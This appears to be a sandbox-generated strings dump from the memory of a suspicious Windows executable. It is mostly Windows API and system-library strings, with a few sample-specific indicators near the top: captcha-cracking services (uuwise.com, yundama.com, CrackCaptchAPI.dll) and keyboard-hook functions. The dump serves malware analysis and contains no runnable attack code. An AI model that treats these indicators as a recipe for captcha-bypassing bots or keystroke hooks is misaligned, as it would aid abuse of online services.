0.cn.pool.ntp.org
cn.pool.ntp.org
!"#$%&'()* ,-.
uuwise.com
2, 0, 0, 4
1.0.0.1
1, 0, 6, 6
- Skin.dll
9.5.25.212
1, 0, 0, 1
woniu.DLL
Windows
1.1.0.0
2.1.0.0
CrackCaptchAPI.dll
yundama.com
1.0.0.6
!"#$%&'()* ,-
25, 0, 0, 1
(*.*)

%original file name%.exe_2060_rwx_01420000_00001000:

MSVCRT.dll
IPHLPAPI.DLL
PSAPI.DLL
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ADVAPI32.dll
SHELL32.dll

%original file name%.exe_2060_rwx_01429000_00003000:

MSVCRT.dll
IPHLPAPI.DLL
PSAPI.DLL
KERNEL32.dll
USER32.dll

%original file name%.exe_2060_rwx_014C0000_00054000:

KERNEL32.dll
USER32.dll
OLEAUT32.dll
ole32.dll
GDI32.dll
.Act\
ADVAPI32.dll
SHELL32.dll
qudP
WS2_32.dll
WINMM.dll
WINSPOOL.DRV
COMCTL32.dll
MSIMG32.dll
RASAPI32.dll
WININET.dll
WLDAP32.dll
ODBC32.dll
oledlg.dll
comdlg32.dll
D$.fP

%original file name%.exe_2060_rwx_01516000_00002000:

UnhookWindowsHookEx
EnumChildWindows
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GDI32.dll
GetViewportExtEx
GetViewportOrgEx

%original file name%.exe_2060_rwx_023C0000_0004C000:

KERNELBASE.dll
BaseGetProcessExePath
BaseReleaseProcessExePath
ConnectNamedPipe
CreateIoCompletionPort
CreateMutexExA
CreateMutexExW
CreateNamedPipeW
CreatePipe
DisconnectNamedPipe
EnumCalendarInfoExEx
EnumDateFormatsExEx
GetCPFileNameFromRegistry
GetCPHashNode
GetCPInfo
GetCPInfoExW
GetNamedPipeAttribute
GetNamedPipeClientComputerNameW
GetProcessHeap
GetProcessHeaps
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryW
GetWindowsAccountDomainSid
GetWindowsDirectoryA
GetWindowsDirectoryW
ImpersonateNamedPipeClient
NeedCurrentDirectoryForExePathA
NeedCurrentDirectoryForExePathW
OpenRegKey
PeekNamedPipe
SetNamedPipeHandleState
SetProcessShutdownParameters
TransactNamedPipe
WaitNamedPipeW
NTDLL.RtlAcquireSRWLockExclusive
NTDLL.RtlAcquireSRWLockShared
NTDLL.TpCancelAsyncIoOperation
NTDLL.TpReleasePool
NTDLL.TpReleaseCleanupGroup
NTDLL.TpReleaseCleanupGroupMembers
NTDLL.TpReleaseIoCompletion
NTDLL.TpReleaseTimer
NTDLL.TpReleaseWait
NTDLL.TpReleaseWork
NTDLL.RtlDecodePointer
NTDLL.RtlDecodeSystemPointer
NTDLL.RtlDeleteCriticalSection
NTDLL.TpDisassociateCallback
NTDLL.RtlEncodePointer
NTDLL.RtlEncodeSystemPointer
NTDLL.RtlEnterCriticalSection
NTDLL.RtlExitUserThread
NTDLL.NtFlushProcessWriteBuffers
NTDLL.TpCallbackUnloadDllOnCompletion
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
NTDLL.RtlReAllocateHeap
NTDLL.RtlSizeHeap
NTDLL.RtlInitializeCriticalSection
NTDLL.RtlInitializeSListHead
NTDLL.RtlInitializeSRWLock
NTDLL.RtlInterlockedCompareExchange64
NTDLL.RtlInterlockedFlushSList
NTDLL.RtlInterlockedPopEntrySList
NTDLL.RtlInterlockedPushEntrySList
NTDLL.RtlInterlockedPushListSList
NTDLL.TpIsTimerSet
NTDLL.RtlLeaveCriticalSection
NTDLL.TpCallbackLeaveCriticalSectionOnCompletion
NTDLL.RtlQueryDepthSList
NTDLL.RtlQueryPerformanceCounter
NTDLL.RtlQueryPerformanceFrequency
NTDLL.TpCallbackReleaseMutexOnCompletion
NTDLL.RtlReleaseSRWLockExclusive
NTDLL.RtlReleaseSRWLockShared
NTDLL.TpCallbackReleaseSemaphoreOnCompletion
NTDLL.RtlSetCriticalSectionSpinCount
NTDLL.TpCallbackSetEventOnCompletion
NTDLL.RtlSetLastWin32Error
NTDLL.TpSetPoolMaxThreads
NTDLL.TpSetTimer
NTDLL.TpSetWait
NTDLL.TpStartAsyncIoOperation
NTDLL.TpPostWork
NTDLL.RtlTryAcquireSRWLockExclusive
NTDLL.RtlTryAcquireSRWLockShared
NTDLL.RtlTryEnterCriticalSection
NTDLL.TpWaitForIoCompletion
NTDLL.TpWaitForTimer
NTDLL.TpWaitForWait
NTDLL.TpWaitForWork
%X@Qu
yNuw.Ou8wNu
j.Xf;
PSSSSSSh
PSSSSSSSh
SSSSh
VWSSh
SXS: %s failing because RtlQueryInformationActivationContext() returned status lx
SXS: %s - Failing thread create because RtlActivateActivationContextEx() failed with status lx
SXS: %s - Failing thread create because RtlQueryInformationActivationContext() failed with status lx
%s - Failing thread create because RtlAllocateActivationContextStack() failed with status lx
PVWSSh
QSSSSh
`VSSSSh
t9VSSSSh
SXS: %s - Failure getting active activation context; ntstatus lx
@$?.Pu
x0-u%f
j.Yf;
t.Ht!HHt
t.HHt#
?456789:;<=
!"#$%&'()* ,-./0123
ntdll.dll
NtCreateNamedPipeFile
NtDelayExecution
NtQueryValueKey
NtOpenKey
RtlReportSilentProcessExit
NtYieldExecution
RtlGetProcessHeaps
NtSetValueKey
NtEnumerateValueKey
NtCreateKey
NtDeleteKey
NtEnumerateKey
NtNotifyChangeKey
NtDeleteValueKey
NtQueryMultipleValueKey
kernelbase.pdb
-Pu?.Pu-iNu
4"4@4^4|4
9-9I9e9}9
Allow flag to be passed with CreateFile call that indicates to perform downgrade if applicable.
kernel32.dll
\Windows
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
NoDefaultCurrentDirectoryInExePath
%s\%x\%s
netmsg.dll
sShortTime
sShortDate
\\.\MountPointManager
\Device\NamedPipe\
\DosDevices\pipe\
\\.\pipe\
pipe\
\\?\UNC
WUSER32.DLL
\\?\UNC\
\\?\GLOBALROOT
0123456789
%s%s%s
Windows NT BASE API Client DLL
6.1.7601.17651 (win7sp1_gdr.110715-1504)
Windows
Operating System
6.1.7601.17651

%original file name%.exe_2060_rwx_024E0000_000A1000:

mpr.dll
ldap_msgfree
1.2.840.113556.1.4.529
wldap32.dll
PSSShd%
ADVAPI32.dll
CryptDeriveKey
CryptDestroyKey
CryptDuplicateKey
CryptExportKey
CryptGenKey
CryptGetKeyParam
CryptGetUserKey
CryptHashSessionKey
CryptImportKey
CryptSetKeyParam
ElfReportEventA
ElfReportEventAndSourceW
ElfReportEventW
EncryptedFileKeyInfo
FreeEncryptedFileKeyInfo
FreeEncryptionCertificateHashList
GetEventLogInformation
GetMultipleTrusteeOperationA
GetMultipleTrusteeOperationW
GetServiceKeyNameA
GetServiceKeyNameW
GetWindowsAccountDomainSid
ImpersonateNamedPipeClient
LogonUserExExW
MSChapSrvChangePassword
MSChapSrvChangePassword2
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExW
RegCreateKeyTransactedA
RegCreateKeyTransactedW
RegCreateKeyW
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteKeyExW
RegDeleteKeyTransactedA
RegDeleteKeyTransactedW
RegDeleteKeyValueA
RegDeleteKeyValueW
RegDeleteKeyW
RegDisableReflectionKey
RegEnableReflectionKey
RegEnumKeyA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyW
RegFlushKey
RegGetKeySecurity
RegLoadAppKeyA
RegLoadAppKeyW
RegLoadKeyA
RegLoadKeyW
RegNotifyChangeKeyValue
RegOpenKeyA
RegOpenKeyExA
RegOpenKeyExW
RegOpenKeyTransactedA
RegOpenKeyTransactedW
RegOpenKeyW
RegOverridePredefKey
RegQueryInfoKeyA
RegQueryInfoKeyW
RegQueryReflectionKey
RegRenameKey
RegReplaceKeyA
RegReplaceKeyW
RegRestoreKeyA
RegRestoreKeyW
RegSaveKeyA
RegSaveKeyExA
RegSaveKeyExW
RegSaveKeyW
RegSetKeySecurity
RegSetKeyValueA
RegSetKeyValueW
RegUnLoadKeyA
RegUnLoadKeyW
ReportEventA
ReportEventW
SaferiIsExecutableFileType
SetUserFileEncryptionKey
SetUserFileEncryptionKeyEx
WmiExecuteMethodA
WmiExecuteMethodW
KERNELBASE.AddMandatoryAce
ntdll.EtwCreateTraceInstanceId
ntdll.EtwEventActivityIdControl
ntdll.EtwEventEnabled
ntdll.EtwEventProviderEnabled
ntdll.EtwEventRegister
ntdll.EtwEventUnregister
ntdll.EtwEventWrite
ntdll.EtwEventWriteEndScenario
ntdll.EtwEventWriteStartScenario
ntdll.EtwEventWriteString
ntdll.EtwEventWriteTransfer
ntdll.EtwGetTraceEnableFlags
ntdll.EtwGetTraceEnableLevel
ntdll.EtwGetTraceLoggerHandle
KERNELBASE.IsValidRelativeSecurityDescriptor
NTDLL.MD4Final
NTDLL.MD4Init
NTDLL.MD4Update
NTDLL.MD5Final
NTDLL.MD5Init
NTDLL.MD5Update
pcwum.PerfCreateInstance
pcwum.PerfDecrementULongCounterValue
pcwum.PerfDecrementULongLongCounterValue
pcwum.PerfDeleteInstance
pcwum.PerfIncrementULongCounterValue
pcwum.PerfIncrementULongLongCounterValue
pcwum.PerfQueryInstance
pcwum.PerfSetCounterRefValue
pcwum.PerfSetCounterSetInfo
pcwum.PerfSetULongCounterValue
pcwum.PerfSetULongLongCounterValue
pcwum.PerfStartProvider
pcwum.PerfStartProviderEx
pcwum.PerfStopProvider
ntdll.EtwRegisterTraceGuidsA
ntdll.EtwRegisterTraceGuidsW
CRYPTSP.CheckSignatureInFile
ntdll.EtwLogTraceEvent
ntdll.EtwTraceEventInstance
ntdll.EtwTraceMessage
ntdll.EtwTraceMessageVa
ntdll.EtwUnregisterTraceGuids
\[%D@
6666666
PSSSSSSh
PSSSSSSh#
PSSSSSSh
PSSSSSSh
(PSSSSSSh
0PSSSSSSh
8PSSSSSSh
v(SSSSSSh
PSSSSSSh!
d:\w7rtm\minkernel\screg\winreg\perflib\manifest.c
CloseWindowStation
GetProcessWindowStation
MsgWaitForMultipleObjects
d:\w7rtm\minkernel\screg\winreg\perflib\extinit.c
d:\w7rtm\minkernel\screg\winreg\perflib\utils.c
d:\w7rtm\minkernel\screg\winreg\perflib\perflib.c
d:\w7rtm\minkernel\screg\winreg\perflib\extquery.c
d:\w7rtm\minkernel\screg\winreg\perflib\perfname.c
d:\w7rtm\minkernel\screg\winreg\perflib\migrate.c
TermsrvSetKeySecurity
TermsrvRestoreKey
TermsrvDeleteKey
TermsrvSetValueKey
tsappcmp.dll
d:\w7rtm\minkernel\screg\winreg\regbase\perflibc.c
d:\w7rtm\minkernel\screg\winreg\perflib\perflibc.c
d:\w7rtm\minkernel\screg\winreg\perflib\pcwconsumer.c
Unable to locate init routine, error = %d
Unable to load client dll, error = %d
SamiChangePasswordUser2
SamiChangePasswordUser
ShellExecuteExW
AccProvGetOperationResults
AccProvCancelOperation
SetupDiOpenDevRegKey
WSShP
u%9x$u/9p
CRYPTSP.dll
WINTRUST.dll
SspiCli.dll
USER32.dll
bcrypt.dll
API-MS-Win-Security-LSALookup-L1-1-0.dll
pcwum.dll
SetProcessWindowStation
RPCRT4.dll
KERNEL32.dll
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
API-MS-Win-Core-NamedPipe-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-WIN-Service-Management-L2-1-0.dll
API-MS-WIN-Service-Management-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
KERNELBASE.dll
ntdll.dll
msvcrt.dll
RtlRunOnceExecuteOnce
NtOpenKey
NtQueryValueKey
NtQueryKey
NtCreateKey
NtSetValueKey
NtDeleteKey
NtEnumerateKey
RtlFormatCurrentUserKeyPath
NtDelayExecution
EtwpGetCpuSpeed
NtRenameKey
NtLoadKeyEx
NtCreateKeyTransacted
NtOpenKeyTransacted
NtQueryMultipleValueKey
NtOpenKeyEx
NtOpenKeyTransactedEx
NtReplaceKey
NtSaveKey
NtSaveMergedKeys
GetSystemWindowsDirectoryW
GetProcessHeap
advapi32.pdb
KEYWt
KEYWX
KEYW
KEYWp
KEYWD
KEYWL
KEYW,
2$3(30343
2 2&212>2
88C8P8X8
7$7,727=7
3&4/454:4
4(6,60646
>$?(?4?\?
5%6U6n7
4 42474^4
<$=(=4=>=_>
1$2(20242<2@2
; ;$;,;0;
20252[2`2
7Ÿ9
1 2$2(2,2
%s\u
x-x-x-xx-xxxxxx
\PIPE\
cryptbase.dll
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%
Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Windows NT Network Provider
\\.\WMIDataDevice
lX-X-X-XX-XXXXXX
Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
%HKEY_LOCAL_MACHINE
%HKEY_CURRENT_USER
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer
\Software\Policies\Microsoft\Windows\Safer
\UrlZones
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
ncacn_ip_tcp
nrpcrt4.dll
%SystemRoot%\
%SystemRoot%\System32\Drivers\
user32.dll
msiltcfg.dll
Software\Microsoft\Windows\CurrentVersion\Group Policy\Appmgmt
Export
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\SystemRoot\system32\perf0000.dat
%SystemRoot%\Debug\UserMode\appmgmt.bak
APPMGMT (%x.%x) d:d:d:d
%s%s%d%s%s%s%s%s%s%s{lx-x-x-xx-xxxxxx}
certificate
PerfDbg.Etl
C:\perfdbg.etl
$winnt$.inf
\SystemRoot\system32\prf00000.dat
127.0.0.1
{lx-x-x-xx-xxxxxx}
UrlZones
DisallowExecution
setupapi.dll
advapi32.dll
iphlpapi.dll
\PIPE\winreg
perfh016.dat
perfc016.dat
perfh004.dat
perfc004.dat
feclient.dll
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Compatibility\Applications\
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
samlib.dll
LsarpcClientAllowRemotedSecretOperations
SupportUrl
Wshell32.dll
CEvents::Report called with more params then expected!
8c7daf44-b6dc-11d1-9a4c-0020af6e7c57
%SystemRoot%\Debug\UserMode\appmgmt.log
{x-x-x-xx-xxxxxx}
\Device\Video%d
WHardwareInformation.BiosString
HardwareInformation.AdapterString
HardwareInformation.DacType
HardwareInformation.ChipType
HardwareInformation.MemorySize
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
\Device\Harddisk%u\Partition0
\\.\%s
Target%d
WindowsShutdown
765294BA-60BC-48B8-92E9-89FD77769D91
ws2_32.dll
NOT_TCPIP
%ws\%ws.tmp
ncacn_nb_tcp
\PIPE\InitShutdown
Advanced Windows 32 Base API
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows
Operating System
6.1.7601.17514
Microsoft-Windows-Kernel-WDI/Analytic
Microsoft-Windows-Kernel-WDI/Debug
Microsoft-Windows-Kernel-WDI/Operational
Keyword
KERNEL_GENERAL_KEYWORD_TIME
Microsoft-Windows-Kernel-Process/Analytic
ReadOperationCount
WriteOperationCount
WINEVENT_KEYWORD_PROCESS
WINEVENT_KEYWORD_THREAD
WINEVENT_KEYWORD_IMAGE
WINEVENT_KEYWORD_CPU_PRIORITY
WINEVENT_KEYWORD_OTHER_PRIORITY
Microsoft-Windows-Kernel-Registry/Analytic
KeyObject
KeyName
CreateKey
OpenKey
DeleteKey
QueryKey
SetValueKey
DeleteValueKey
QueryValueKey
EnumerateKey
EnumerateValueKey
QueryMultipleValueKey
SetInformationKey
FlushKey
CloseKey
QuerySecurityKey
SetSecurityKey
Microsoft-Windows-Kernel-PnP/Diagnostic
Pnp:DpReplace.ExtendedStatusMap
SqmWindowsSessionId
Microsoft-Windows-Kernel-Acpi/Diagnostic
Microsoft-Windows-International/Operational
RegistryKey
Operation
Microsoft-Windows-User-Loader/Analytic
USER_LOADER_KEYWORD_DEPRECATED_DLL
Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic
Microsoft-Windows-Kernel-Prefetch/Diagnostic
Microsoft-Windows-UAC/Operational
Microsoft-Windows-COM/Analytic
/hXXp://schemas.microsoft.com/win/2004/08/events
DhXXp://schemas.microsoft.com/schemas/event/Microsoft.Windows/1.0.0.0
Microsoft-Windows-MUI/Operational
Microsoft-Windows-MUI/Admin
Microsoft-Windows-MUI/Analytic
Microsoft-Windows-MUI/Debug
Microsoft-Windows-Kernel-Network/Analytic
dport
sport
KERNEL_NETWORK_OPCODE_TCPCOPY
KERNEL_NETWORK_OPCODE_SENDUDP
KERNEL_NETWORK_OPCODE_RECVUDP
KERNEL_NETWORK_OPCODE_FAILUDP
KERNEL_NETWORK_TASK_TCPIP
KERNEL_NETWORK_TASK_UDPIP
KERNEL_NETWORK_KEYWORD_IPV4
KERNEL_NETWORK_KEYWORD_IPV6
Microsoft-Windows-Kernel-Disk/Analytic
Microsoft-Windows-Kernel-EventTracing/Admin
Microsoft-Windows-Kernel-EventTracing/Analytic
ETW_KEYWORD_SESSION
ETW_KEYWORD_PROVIDER
Microsoft-Windows-Kernel-Boot/Analytic
Microsoft-Windows-Kernel-File/Analytic
FileKey
OperationEnd
KERNEL_FILE_KEYWORD_FILENAME
KERNEL_FILE_KEYWORD_FILEIO
KERNEL_FILE_KEYWORD_OP_END
KERNEL_FILE_KEYWORD_CREATE
KERNEL_FILE_KEYWORD_READ
KERNEL_FILE_KEYWORD_WRITE
KERNEL_FILE_KEYWORD_DELETE_PATH
KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH
KERNEL_FILE_KEYWORD_CREATE_NEW_FILE
Microsoft-Windows-PCI/Diagnostic
Microsoft-Windows-Kernel-StoreMgr/Analytic
Microsoft-Windows-Kernel-StoreMgr/Operational
CacheTerminationMsgMap
StoreMgrCorruptPageMsgMap
DataKey
StoreKey
StoreFileKey
Microsoft-Windows-Kernel-Memory/Analytic
KERNEL_MEM_KEYWORD_MEMINFO

%original file name%.exe_2060_rwx_02670000_0001E000:

IPHLPAPI.DLL
CreatePersistentTcpPortReservation
CreatePersistentUdpPortReservation
DeletePersistentTcpPortReservation
DeletePersistentUdpPortReservation
GetExtendedTcpTable
GetExtendedUdpTable
GetOwnerModuleFromTcp6Entry
GetOwnerModuleFromTcpEntry
GetOwnerModuleFromUdp6Entry
GetOwnerModuleFromUdpEntry
GetPerTcp6ConnectionEStats
GetPerTcp6ConnectionStats
GetPerTcpConnectionEStats
GetPerTcpConnectionStats
GetTcp6Table
GetTcp6Table2
GetTcpStatistics
GetTcpStatisticsEx
GetTcpTable
GetTcpTable2
GetTeredoPort
GetUdp6Table
GetUdpStatistics
GetUdpStatisticsEx
GetUdpTable
InternalGetTcp6Table2
InternalGetTcp6TableWithOwnerModule
InternalGetTcp6TableWithOwnerPid
InternalGetTcpTable
InternalGetTcpTable2
InternalGetTcpTableEx
InternalGetTcpTableWithOwnerModule
InternalGetTcpTableWithOwnerPid
InternalGetUdp6TableWithOwnerModule
InternalGetUdp6TableWithOwnerPid
InternalGetUdpTable
InternalGetUdpTableEx
InternalGetUdpTableWithOwnerModule
InternalGetUdpTableWithOwnerPid
InternalSetTcpEntry
InternalSetTeredoPort
LookupPersistentTcpPortReservation
LookupPersistentUdpPortReservation
NotifyTeredoPortChange
SetPerTcp6ConnectionEStats
SetPerTcp6ConnectionStats
SetPerTcpConnectionEStats
SetPerTcpConnectionStats
SetTcpEntry
{lX-X-X-XX-XXXXXX}
SYSTEM\CurrentControlSet\Services\Tcpip\Linkage
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
Ht.HHt
%SSSSj
dhcpcsvc.DLL
dhcpcsvc6.DLL
DNSAPI.dll
WS2_32.dll
API-MS-Win-Core-DelayLoad-L1-1-0.dll
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-Win-Core-SysInfo-L1-1-0.dll
API-MS-Win-Core-Synch-L1-1-0.dll
API-MS-Win-Core-String-L1-1-0.dll
API-MS-Win-Core-Profile-L1-1-0.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
API-MS-Win-Core-Misc-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-Win-Core-LibraryLoader-L1-1-0.dll
API-MS-Win-Core-Interlocked-L1-1-0.dll
API-MS-Win-Core-Heap-L1-1-0.dll
API-MS-Win-Core-Handle-L1-1-0.dll
API-MS-Win-Core-ErrorHandling-L1-1-0.dll
RPCRT4.dll
WINNSI.DLL
NSI.dll
ntdll.dll
msvcrt.dll
_amsg_exit
GetProcessHeap
RegOpenKeyExA
RegCloseKey
iphlpapi.pdb
2#3)3/343<3
7 7$7(7,707
:&;5;&<8<
4&4-44484C4N4S4c4h4x4}4
0 0(0,00080<0@0
\DEVICE\TCPIP_
%s_%u
\DEVICE\NETBT_TCPIP_
iftype%u
\advapi32.dll
6.1.7601.17514 (win7sp1_rtm.101119-1850)
iphlpapi.dll
Windows
Operating System
6.1.7601.17514

%original file name%.exe_2060_rwx_026B0000_0013D000:

8SsHd
d:\win7sp1_gdr\minkernel\threadpool\ntdll\cgrp.c
<P.tmB;
TppWorkpExecuteCallback
TppSimplepExecuteCallback
d:\win7sp1_gdr\minkernel\threadpool\ntdll\simple.c
d:\win7sp1_gdr\minkernel\threadpool\ntdll\io.c
SsHd;
_CorExeMain
tùp
!wSSh
d:\win7sp1_gdr\minkernel\threadpool\ntdll\waiter.c
TppWaitpExecuteCallback
TppTimerpExecuteCallback
d:\win7sp1_gdr\minkernel\threadpool\ntdll\cgrpmem.c
d:\win7sp1_gdr\minkernel\threadpool\ntdll\lpc.c
TppAlpcpExecuteCallback
d:\win7sp1_gdr\minkernel\threadpool\ntdll\callback.c
ntdll.dll
EtwpGetCpuSpeed
EvtIntReportAuthzEventAndSourceAsync
EvtIntReportEventAndSourceAsync
LdrOpenImageFileOptionsKey
LdrQueryImageFileExecutionOptions
LdrQueryImageFileExecutionOptionsEx
LdrQueryImageFileKeyOption
NtAcceptConnectPort
NtAlpcAcceptConnectPort
NtAlpcConnectPort
NtAlpcCreatePort
NtAlpcCreatePortSection
NtAlpcDeletePortSection
NtAlpcDisconnectPort
NtAlpcImpersonateClientOfPort
NtAlpcSendWaitReceivePort
NtCompactKeys
NtCompleteConnectPort
NtCompressKey
NtConnectPort
NtCreateKey
NtCreateKeyTransacted
NtCreateKeyedEvent
NtCreateNamedPipeFile
NtCreatePort
NtCreateWaitablePort
NtDelayExecution
NtDeleteKey
NtDeleteValueKey
NtEnumerateKey
NtEnumerateValueKey
NtFlushKey
NtImpersonateClientOfPort
NtListenPort
NtLoadKey
NtLoadKey2
NtLoadKeyEx
NtLockProductActivationKeys
NtLockRegistryKey
NtNotifyChangeKey
NtNotifyChangeMultipleKeys
NtOpenKey
NtOpenKeyEx
NtOpenKeyTransacted
NtOpenKeyTransactedEx
NtOpenKeyedEvent
NtQueryInformationPort
NtQueryKey
NtQueryMultipleValueKey
NtQueryOpenSubKeys
NtQueryOpenSubKeysEx
NtQueryPortInformationProcess
NtQueryValueKey
NtRegisterThreadTerminatePort
NtReleaseKeyedEvent
NtRenameKey
NtReplaceKey
NtReplyPort
NtReplyWaitReceivePort
NtReplyWaitReceivePortEx
NtReplyWaitReplyPort
NtRequestPort
NtRequestWaitReplyPort
NtRestoreKey
NtSaveKey
NtSaveKeyEx
NtSaveMergedKeys
NtSecureConnectPort
NtSetDefaultHardErrorPort
NtSetInformationKey
NtSetThreadExecutionState
NtSetValueKey
NtUnloadKey
NtUnloadKey2
NtUnloadKeyEx
NtWaitForKeyedEvent
NtYieldExecution
RtlCheckRegistryKey
RtlCmDecodeMemIoResource
RtlComputeImportTableHash
RtlCreateRegistryKey
RtlEnumProcessHeaps
RtlFormatCurrentUserKeyPath
RtlGetProcessHeaps
RtlIsCurrentThreadAttachExempt
RtlQueryProcessHeapInformation
RtlReportException
RtlReportSilentProcessExit
RtlReportSqmEscalation
RtlRunOnceExecuteOnce
RtlSendMsgToSm
RtlValidateProcessHeaps
RtlWerpReportException
RtlpCleanupRegistryKeys
RtlpNtCreateKey
RtlpNtEnumerateSubKey
RtlpNtMakeTemporaryKey
RtlpNtOpenKey
RtlpNtQueryValueKey
RtlpNtSetValueKey
SbExecuteProcedure
ShipAssert
ShipAssertGetBufferInfo
ShipAssertMsgA
ShipAssertMsgW
TpCancelAsyncIoOperation
TpStartAsyncIoOperation
WerReportSQMEvent
ZwAcceptConnectPort
ZwAlpcAcceptConnectPort
ZwAlpcConnectPort
ZwAlpcCreatePort
ZwAlpcCreatePortSection
ZwAlpcDeletePortSection
ZwAlpcDisconnectPort
ZwAlpcImpersonateClientOfPort
ZwAlpcSendWaitReceivePort
ZwCompactKeys
ZwCompleteConnectPort
ZwCompressKey
ZwConnectPort
ZwCreateKey
ZwCreateKeyTransacted
ZwCreateKeyedEvent
ZwCreateNamedPipeFile
ZwCreatePort
ZwCreateWaitablePort
ZwDelayExecution
ZwDeleteKey
ZwDeleteValueKey
ZwEnumerateKey
ZwEnumerateValueKey
ZwFlushKey
ZwImpersonateClientOfPort
ZwListenPort
ZwLoadKey
ZwLoadKey2
ZwLoadKeyEx
ZwLockProductActivationKeys
ZwLockRegistryKey
ZwNotifyChangeKey
ZwNotifyChangeMultipleKeys
ZwOpenKey
ZwOpenKeyEx
ZwOpenKeyTransacted
ZwOpenKeyTransactedEx
ZwOpenKeyedEvent
ZwQueryInformationPort
ZwQueryKey
ZwQueryMultipleValueKey
ZwQueryOpenSubKeys
ZwQueryOpenSubKeysEx
ZwQueryPortInformationProcess
ZwQueryValueKey
ZwRegisterThreadTerminatePort
ZwReleaseKeyedEvent
ZwRenameKey
ZwReplaceKey
ZwReplyPort
ZwReplyWaitReceivePort
ZwReplyWaitReceivePortEx
ZwReplyWaitReplyPort
ZwRequestPort
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSaveKey
ZwSaveKeyEx
ZwSaveMergedKeys
ZwSecureConnectPort
ZwSetDefaultHardErrorPort
ZwSetInformationKey
ZwSetThreadExecutionState
ZwSetValueKey
ZwUnloadKey
ZwUnloadKey2
ZwUnloadKeyEx
ZwWaitForKeyedEvent
ZwYieldExecution
.txt2
secserv.dll
.sforce
.pcle
.aspack
Set 0x%X protection for %p section for %d bytes, old protection 0x%X
CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions
x:x @ d - %s - %s:
d:\win7sp1_gdr\minkernel\ntdll\ldrapi.c
d:\win7sp1_gdr\minkernel\ntdll\ldrfind.c
Changing the protection of the executable at %p failed with status 0xlx
d:\win7sp1_gdr\minkernel\ntdll\ldrinit.c
Exception record: .exr %p
Context record: .cxr %p
Process 0x%x (%wZ) exiting
Could not locate procedure "%s" in the shim engine DLL
LdrpInitializeExecutionOptions
Running the init routines of the executable's static imports failed with status 0xlx
Loading Windows subsystem DLL "%wZ" failed with status 0xlx
Walking the import tables of the executable and its static imports failed with status 0xlx
Locating procedure "%Z" in Windows subsystem DLL "%wZ" failed with status 0xlx
Beginning execution of %wZ (%wZ)
Allocating a data table entry for the executable failed
Initializing the execution options for the process %lx failed with status 0xlx
Delaying execution failed with status 0xlx
d:\win7sp1_gdr\minkernel\ntdll\ldrsnap.c
LdrpLoadImportModule
DLL name: %s DLL path: %wZ
Calling the Windows subsystem post-import routine %p failed with status 0xlx
Procedure "%s" could not be located in DLL "%s"
Ordinal 0x%lx could not be located in DLL "%s"
Hint index 0x%lx for procedure "%s" in DLL "%s" is invalid
%s loaded DLL "%wZ" (new reference count: 0x%lx)
LdrpFixupIATForRelocatedImport
DLL "%wZ" does not contain an export table
DLL "%wZ" is bound via forwarders to "%s"
Loading "%ws" from the bound import table of DLL "%wZ" failed with status 0xlx
DLL "%wZ" is bound to "%s"
LdrpHandleOneNewFormatImportDescriptor
Snapping the imports from DLL "%wZ" to DLL "%wZ" failed with status 0xlx
Loading "%ws" from the import table of DLL "%wZ" failed with status 0xlx
DLL "%wZ" imports "%s"
LdrpHandleOneOldFormatImportDescriptor
LdrpProcessStaticImports
d:\win7sp1_gdr\minkernel\ntdll\ldrtls.c
TlsVector %p Index %d : %d bytes copied from %p to %p
Execute '.cxr %p' to dump context
d:\win7sp1_gdr\minkernel\ntdll\ldrutil.c
Function %s raised exception 0xlx
RTL: Acquire Shared Sem Timeout %d(%I64u secs)
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)
NTDLL: Calling thread (%X) not owner of CritSect: %p Owner ThreadId: %X
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu
RTL: Enter Critical Section Timeout (%I64u secs) %d
AVRF: Found duplicate for (%ws: %s) in %ws
AVRF: chain: thunk: %s == %s ?
AVRF: Chaining (%ws: %s) to %ws
AVRF: Checking %ws for duplicate (%ws: %s)
AVRF: Snapped (%ws: %s) with (%ws: %p).
AVRF: internal error: New thunk for %s is null.
AVRF: Unable to unprotect IAT to modify thunks (status X).
AVRF: (%ws) %s export found.
AVRF: warning: did not find `%s' export in %ws .
